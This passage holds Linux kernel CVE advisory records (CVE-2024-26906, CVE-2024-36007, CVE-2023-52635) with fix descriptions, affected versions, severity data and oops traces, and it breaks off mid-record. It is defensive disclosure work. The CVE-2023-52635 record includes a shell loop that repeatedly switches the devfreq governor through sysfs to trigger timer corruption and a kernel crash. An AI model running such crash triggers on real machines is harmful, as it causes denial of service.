},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/mm: Disallow vsyscall page read for copy_from_kernel_nofault()\n\nWhen trying to use copy_from_kernel_nofault() to read vsyscall page\nthrough a bpf program, the following oops was reported:\n\n BUG: unable to handle page fault for address: ffffffffff600000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 3231067 P4D 3231067 PUD 3233067 PMD 3235067 PTE 0\n Oops: 0000 [#1] PREEMPT SMP PTI\n CPU: 1 PID: 20390 Comm: test_progs ...... 6.7.0+ #58\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996) ......\n RIP: 0010:copy_from_kernel_nofault+0x6f/0x110\n ......\n Call Trace:\n \u003cTASK\u003e\n ? copy_from_kernel_nofault+0x6f/0x110\n bpf_probe_read_kernel+0x1d/0x50\n bpf_prog_2061065e56845f08_do_probe_read+0x51/0x8d\n trace_call_bpf+0xc5/0x1c0\n perf_call_bpf_enter.isra.0+0x69/0xb0\n perf_syscall_enter+0x13e/0x200\n syscall_trace_enter+0x188/0x1c0\n do_syscall_64+0xb5/0xe0\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n \u003c/TASK\u003e\n ......\n ---[ end trace 0000000000000000 ]---\n\nThe oops is triggered when:\n\n1) A bpf program uses bpf_probe_read_kernel() to read from the vsyscall\npage and invokes copy_from_kernel_nofault() which in turn calls\n__get_user_asm().\n\n2) Because the vsyscall page address is not readable from kernel space,\na page fault exception is triggered accordingly.\n\n3) handle_page_fault() considers the vsyscall page address as a user\nspace address instead of a kernel space address. This results in the\nfix-up setup by bpf not being applied and a page_fault_oops() is invoked\ndue to SMAP.\n\nConsidering handle_page_fault() has already considered the vsyscall page\naddress as a userspace address, fix the problem by disallowing vsyscall\npage read for copy_from_kernel_nofault()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:59:19.712Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6e4694e65b6db4c3de125115dd4f55848cc48381"
},
{
"url": "https://git.kernel.org/stable/c/e8a67fe34b76a49320b33032228a794f40b0316b"
},
{
"url": "https://git.kernel.org/stable/c/f175de546a3eb77614d94d4c02550181c0a8493e"
},
{
"url": "https://git.kernel.org/stable/c/57f78c46f08198e1be08ffe99c4c1ccc12855bf5"
},
{
"url": "https://git.kernel.org/stable/c/29bd6f86904682adafe9affbc7f79b14defcaff8"
},
{
"url": "https://git.kernel.org/stable/c/32019c659ecfe1d92e3bf9fcdfbb11a7c70acd58"
}
],
"title": "x86/mm: Disallow vsyscall page read for copy_from_kernel_nofault()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26906",
"datePublished": "2024-04-17T10:27:53.573Z",
"dateReserved": "2024-02-19T14:20:24.187Z",
"dateUpdated": "2025-05-04T08:59:19.712Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36007 (GCVE-0-2024-36007)
Vulnerability from cvelistv5
Published
2024-05-20 09:48
Modified
2025-05-04 09:10
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_acl_tcam: Fix warning during rehash
As previously explained, the rehash delayed work migrates filters from
one region to another. This is done by iterating over all chunks (all
the filters with the same priority) in the region and in each chunk
iterating over all the filters.
When the work runs out of credits it stores the current chunk and entry
as markers in the per-work context so that it would know where to resume
the migration from the next time the work is scheduled.
Upon error, the chunk marker is reset to NULL, but without resetting the
entry markers despite being relative to it. This can result in migration
being resumed from an entry that does not belong to the chunk being
migrated. In turn, this will eventually lead to a chunk being iterated
over as if it is an entry. Because of how the two structures happen to
be defined, this does not lead to KASAN splats, but to warnings such as
[1].
Fix by creating a helper that resets all the markers and call it from
all the places the currently only reset the chunk marker. For good
measures also call it when starting a completely new rehash. Add a
warning to avoid future cases.
[1]
WARNING: CPU: 7 PID: 1076 at drivers/net/ethernet/mellanox/mlxsw/core_acl_flex_keys.c:407 mlxsw_afk_encode+0x242/0x2f0
Modules linked in:
CPU: 7 PID: 1076 Comm: kworker/7:24 Tainted: G W 6.9.0-rc3-custom-00880-g29e61d91b77b #29
Hardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019
Workqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work
RIP: 0010:mlxsw_afk_encode+0x242/0x2f0
[...]
Call Trace:
<TASK>
mlxsw_sp_acl_atcam_entry_add+0xd9/0x3c0
mlxsw_sp_acl_tcam_entry_create+0x5e/0xa0
mlxsw_sp_acl_tcam_vchunk_migrate_all+0x109/0x290
mlxsw_sp_acl_tcam_vregion_rehash_work+0x6c/0x470
process_one_work+0x151/0x370
worker_thread+0x2cb/0x3e0
kthread+0xd0/0x100
ret_from_fork+0x34/0x50
</TASK>
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf Version: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf Version: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf Version: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf Version: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf Version: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf Version: 6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-36007",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-31T18:47:44.179419Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-06T15:10:37.319Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:30:11.636Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0b88631855026b55cad901ac28d081e0f358e596"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1d76bd2a0034d0d08045c1c6adf2235d88982952"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/039992b6d2df097c65f480dcf269de3d2656f573"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/751d352858108314efd33dddd5a9a2b6bf7d6916"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e890456051fe8c57944b911defb3e6de91315861"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/17e9e0bbae652b9b2049e51699e93dfa60b2988d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/743edc8547a92b6192aa1f1b6bb78233fa21dc9b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0b88631855026b55cad901ac28d081e0f358e596",
"status": "affected",
"version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
"versionType": "git"
},
{
"lessThan": "1d76bd2a0034d0d08045c1c6adf2235d88982952",
"status": "affected",
"version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
"versionType": "git"
},
{
"lessThan": "039992b6d2df097c65f480dcf269de3d2656f573",
"status": "affected",
"version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
"versionType": "git"
},
{
"lessThan": "751d352858108314efd33dddd5a9a2b6bf7d6916",
"status": "affected",
"version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
"versionType": "git"
},
{
"lessThan": "e890456051fe8c57944b911defb3e6de91315861",
"status": "affected",
"version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
"versionType": "git"
},
{
"lessThan": "17e9e0bbae652b9b2049e51699e93dfa60b2988d",
"status": "affected",
"version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
"versionType": "git"
},
{
"lessThan": "743edc8547a92b6192aa1f1b6bb78233fa21dc9b",
"status": "affected",
"version": "6f9579d4e3021b17b0a4cde6b04a6c94c9575cdf",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_tcam: Fix warning during rehash\n\nAs previously explained, the rehash delayed work migrates filters from\none region to another. This is done by iterating over all chunks (all\nthe filters with the same priority) in the region and in each chunk\niterating over all the filters.\n\nWhen the work runs out of credits it stores the current chunk and entry\nas markers in the per-work context so that it would know where to resume\nthe migration from the next time the work is scheduled.\n\nUpon error, the chunk marker is reset to NULL, but without resetting the\nentry markers despite being relative to it. This can result in migration\nbeing resumed from an entry that does not belong to the chunk being\nmigrated. In turn, this will eventually lead to a chunk being iterated\nover as if it is an entry. Because of how the two structures happen to\nbe defined, this does not lead to KASAN splats, but to warnings such as\n[1].\n\nFix by creating a helper that resets all the markers and call it from\nall the places the currently only reset the chunk marker. For good\nmeasures also call it when starting a completely new rehash. Add a\nwarning to avoid future cases.\n\n[1]\nWARNING: CPU: 7 PID: 1076 at drivers/net/ethernet/mellanox/mlxsw/core_acl_flex_keys.c:407 mlxsw_afk_encode+0x242/0x2f0\nModules linked in:\nCPU: 7 PID: 1076 Comm: kworker/7:24 Tainted: G W 6.9.0-rc3-custom-00880-g29e61d91b77b #29\nHardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019\nWorkqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work\nRIP: 0010:mlxsw_afk_encode+0x242/0x2f0\n[...]\nCall Trace:\n \u003cTASK\u003e\n mlxsw_sp_acl_atcam_entry_add+0xd9/0x3c0\n mlxsw_sp_acl_tcam_entry_create+0x5e/0xa0\n mlxsw_sp_acl_tcam_vchunk_migrate_all+0x109/0x290\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x6c/0x470\n process_one_work+0x151/0x370\n worker_thread+0x2cb/0x3e0\n kthread+0xd0/0x100\n ret_from_fork+0x34/0x50\n \u003c/TASK\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:10:23.205Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0b88631855026b55cad901ac28d081e0f358e596"
},
{
"url": "https://git.kernel.org/stable/c/1d76bd2a0034d0d08045c1c6adf2235d88982952"
},
{
"url": "https://git.kernel.org/stable/c/039992b6d2df097c65f480dcf269de3d2656f573"
},
{
"url": "https://git.kernel.org/stable/c/751d352858108314efd33dddd5a9a2b6bf7d6916"
},
{
"url": "https://git.kernel.org/stable/c/e890456051fe8c57944b911defb3e6de91315861"
},
{
"url": "https://git.kernel.org/stable/c/17e9e0bbae652b9b2049e51699e93dfa60b2988d"
},
{
"url": "https://git.kernel.org/stable/c/743edc8547a92b6192aa1f1b6bb78233fa21dc9b"
}
],
"title": "mlxsw: spectrum_acl_tcam: Fix warning during rehash",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36007",
"datePublished": "2024-05-20T09:48:06.947Z",
"dateReserved": "2024-05-17T13:50:33.151Z",
"dateUpdated": "2025-05-04T09:10:23.205Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52635 (GCVE-0-2023-52635)
Vulnerability from cvelistv5
Published
2024-04-02 06:49
Modified
2025-05-04 07:40
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
PM / devfreq: Synchronize devfreq_monitor_[start/stop]
There is a chance if a frequent switch of the governor
done in a loop result in timer list corruption where
timer cancel being done from two place one from
cancel_delayed_work_sync() and followed by expire_timers()
can be seen from the traces[1].
while true
do
echo "simple_ondemand" > /sys/class/devfreq/1d84000.ufshc/governor
echo "performance" > /sys/class/devfreq/1d84000.ufshc/governor
done
It looks to be issue with devfreq driver where
device_monitor_[start/stop] need to synchronized so that
delayed work should get corrupted while it is either
being queued or running or being cancelled.
Let's use polling flag and devfreq lock to synchronize the
queueing the timer instance twice and work data being
corrupted.
[1]
...
..
<idle>-0 [003] 9436.209662: timer_cancel timer=0xffffff80444f0428
<idle>-0 [003] 9436.209664: timer_expire_entry timer=0xffffff80444f0428 now=0x10022da1c function=__typeid__ZTSFvP10timer_listE_global_addr baseclk=0x10022da1c
<idle>-0 [003] 9436.209718: timer_expire_exit timer=0xffffff80444f0428
kworker/u16:6-14217 [003] 9436.209863: timer_start timer=0xffffff80444f0428 function=__typeid__ZTSFvP10timer_listE_global_addr expires=0x10022da2b now=0x10022da1c flags=182452227
vendor.xxxyyy.ha-1593 [004] 9436.209888: timer_cancel timer=0xffffff80444f0428
vendor.xxxyyy.ha-1593 [004] 9436.216390: timer_init timer=0xffffff80444f0428
vendor.xxxyyy.ha-1593 [004] 9436.216392: timer_start timer=0xffffff80444f0428 function=__typeid__ZTSFvP10timer_listE_global_addr expires=0x10022da2c now=0x10022da1d flags=186646532
vendor.xxxyyy.ha-1593 [005] 9436.220992: timer_cancel timer=0xffffff80444f0428
xxxyyyTraceManag-7795 [004] 9436.261641: timer_cancel timer=0xffffff80444f0428
[2]
9436.261653][ C4] Unable to handle kernel paging request at virtual address dead00000000012a
[ 9436.261664][ C4] Mem abort info:
[ 9436.261666][ C4] ESR = 0x96000044
[ 9436.261669][ C4] EC = 0x25: DABT (current EL), IL = 32 bits
[ 9436.261671][ C4] SET = 0, FnV = 0
[ 9436.261673][ C4] EA = 0, S1PTW = 0
[ 9436.261675][ C4] Data abort info:
[ 9436.261677][ C4] ISV = 0, ISS = 0x00000044
[ 9436.261680][ C4] CM = 0, WnR = 1
[ 9436.261682][ C4] [dead00000000012a] address between user and kernel address ranges
[ 9436.261685][ C4] Internal error: Oops: 96000044 [#1] PREEMPT SMP
[ 9436.261701][ C4] Skip md ftrace buffer dump for: 0x3a982d0
...
[ 9436.262138][ C4] CPU: 4 PID: 7795 Comm: TraceManag Tainted: G S W O 5.10.149-android12-9-o-g17f915d29d0c #1
[ 9436.262141][ C4] Hardware name: Qualcomm Technologies, Inc. (DT)
[ 9436.262144][ C4] pstate: 22400085 (nzCv daIf +PAN -UAO +TCO BTYPE=--)
[ 9436.262161][ C4] pc : expire_timers+0x9c/0x438
[ 9436.262164][ C4] lr : expire_timers+0x2a4/0x438
[ 9436.262168][ C4] sp : ffffffc010023dd0
[ 9436.262171][ C4] x29: ffffffc010023df0 x28: ffffffd0636fdc18
[ 9436.262178][ C4] x27: ffffffd063569dd0 x26: ffffffd063536008
[ 9436.262182][ C4] x25: 0000000000000001 x24: ffffff88f7c69280
[ 9436.262185][ C4] x23: 00000000000000e0 x22: dead000000000122
[ 9436.262188][ C4] x21: 000000010022da29 x20: ffffff8af72b4e80
[ 9436.262191][ C4] x19: ffffffc010023e50 x18: ffffffc010025038
[ 9436.262195][ C4] x17: 0000000000000240 x16: 0000000000000201
[ 9436.262199][ C4] x15: ffffffffffffffff x14: ffffff889f3c3100
[ 9436.262203][ C4] x13: ffffff889f3c3100 x12: 00000000049f56b8
[ 9436.262207][ C4] x11: 00000000049f56b8 x10: 00000000ffffffff
[ 9436.262212][ C4] x9 : ffffffc010023e50 x8 : dead000000000122
[ 9436.262216][ C4] x7 : ffffffffffffffff x6 : ffffffc0100239d8
[ 9436.262220][ C4] x5 : 0000000000000000 x4 : 0000000000000101
[ 9436.262223][ C4] x3 : 0000000000000080 x2 : ffffff8
---truncated---
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52635",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T19:30:55.797428Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T19:31:03.162Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.345Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3399cc7013e761fee9d6eec795e9b31ab0cbe475"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/099f6a9edbe30b142c1d97fe9a4748601d995675"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/31569995fc65007b73a3fff605ec2b3401b435e9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0aedb319ef3ed39e9e5a7b7726c8264ca627bbd9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae815e2fdc284ab31651d52460698bd89c0fce22"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aed5ed595960c6d301dcd4ed31aeaa7a8054c0c6"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/devfreq/devfreq.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3399cc7013e761fee9d6eec795e9b31ab0cbe475",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "099f6a9edbe30b142c1d97fe9a4748601d995675",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "31569995fc65007b73a3fff605ec2b3401b435e9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0aedb319ef3ed39e9e5a7b7726c8264ca627bbd9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ae815e2fdc284ab31651d52460698bd89c0fce22",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "aed5ed595960c6d301dcd4ed31aeaa7a8054c0c6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/devfreq/devfreq.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nPM / devfreq: Synchronize devfreq_monitor_[start/stop]\n\nThere is a chance if a frequent switch of the governor\ndone in a loop result in timer list corruption where\ntimer cancel being done from two place one from\ncancel_delayed_work_sync() and followed by expire_timers()\ncan be seen from the traces[1].\n\nwhile true\ndo\n echo \"simple_ondemand\" \u003e /sys/class/devfreq/1d84000.ufshc/governor\n echo \"performance\" \u003e /sys/class/devfreq/1d84000.ufshc/governor\ndone\n\nIt looks to be issue with devfreq driver where\ndevice_monitor_[start/stop] need to synchronized so that\ndelayed work should get corrupted while it is either\nbeing queued or running or being cancelled.\n\nLet\u0027s use polling flag and devfreq lock to synchronize the\nqueueing the timer instance twice and work data being\ncorrupted.\n\n[1]\n...\n..\n\u003cidle\u003e-0 [003] 9436.209662: timer_cancel timer=0xffffff80444f0428\n\u003cidle\u003e-0 [003] 9436.209664: timer_expire_entry timer=0xffffff80444f0428 now=0x10022da1c function=__typeid__ZTSFvP10timer_listE_global_addr baseclk=0x10022da1c\n\u003cidle\u003e-0 [003] 9436.209718: timer_expire_exit timer=0xffffff80444f0428\nkworker/u16:6-14217 [003] 9436.209863: timer_start timer=0xffffff80444f0428 function=__typeid__ZTSFvP10timer_listE_global_addr expires=0x10022da2b now=0x10022da1c flags=182452227\nvendor.xxxyyy.ha-1593 [004] 9436.209888: timer_cancel timer=0xffffff80444f0428\nvendor.xxxyyy.ha-1593 [004] 9436.216390: timer_init timer=0xffffff80444f0428\nvendor.xxxyyy.ha-1593 [004] 9436.216392: timer_start timer=0xffffff80444f0428 function=__typeid__ZTSFvP10timer_listE_global_addr expires=0x10022da2c now=0x10022da1d flags=186646532\nvendor.xxxyyy.ha-1593 [005] 9436.220992: timer_cancel timer=0xffffff80444f0428\nxxxyyyTraceManag-7795 [004] 9436.261641: timer_cancel timer=0xffffff80444f0428\n\n[2]\n\n 9436.261653][ C4] Unable to handle kernel paging request at virtual address dead00000000012a\n[ 9436.261664][ C4] Mem abort info:\n[ 9436.261666][ C4] ESR = 0x96000044\n[ 9436.261669][ C4] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 9436.261671][ C4] SET = 0, FnV = 0\n[ 9436.261673][ C4] EA = 0, S1PTW = 0\n[ 9436.261675][ C4] Data abort info:\n[ 9436.261677][ C4] ISV = 0, ISS = 0x00000044\n[ 9436.261680][ C4] CM = 0, WnR = 1\n[ 9436.261682][ C4] [dead00000000012a] address between user and kernel address ranges\n[ 9436.261685][ C4] Internal error: Oops: 96000044 [#1] PREEMPT SMP\n[ 9436.261701][ C4] Skip md ftrace buffer dump for: 0x3a982d0\n...\n\n[ 9436.262138][ C4] CPU: 4 PID: 7795 Comm: TraceManag Tainted: G S W O 5.10.149-android12-9-o-g17f915d29d0c #1\n[ 9436.262141][ C4] Hardware name: Qualcomm Technologies, Inc. (DT)\n[ 9436.262144][ C4] pstate: 22400085 (nzCv daIf +PAN -UAO +TCO BTYPE=--)\n[ 9436.262161][ C4] pc : expire_timers+0x9c/0x438\n[ 9436.262164][ 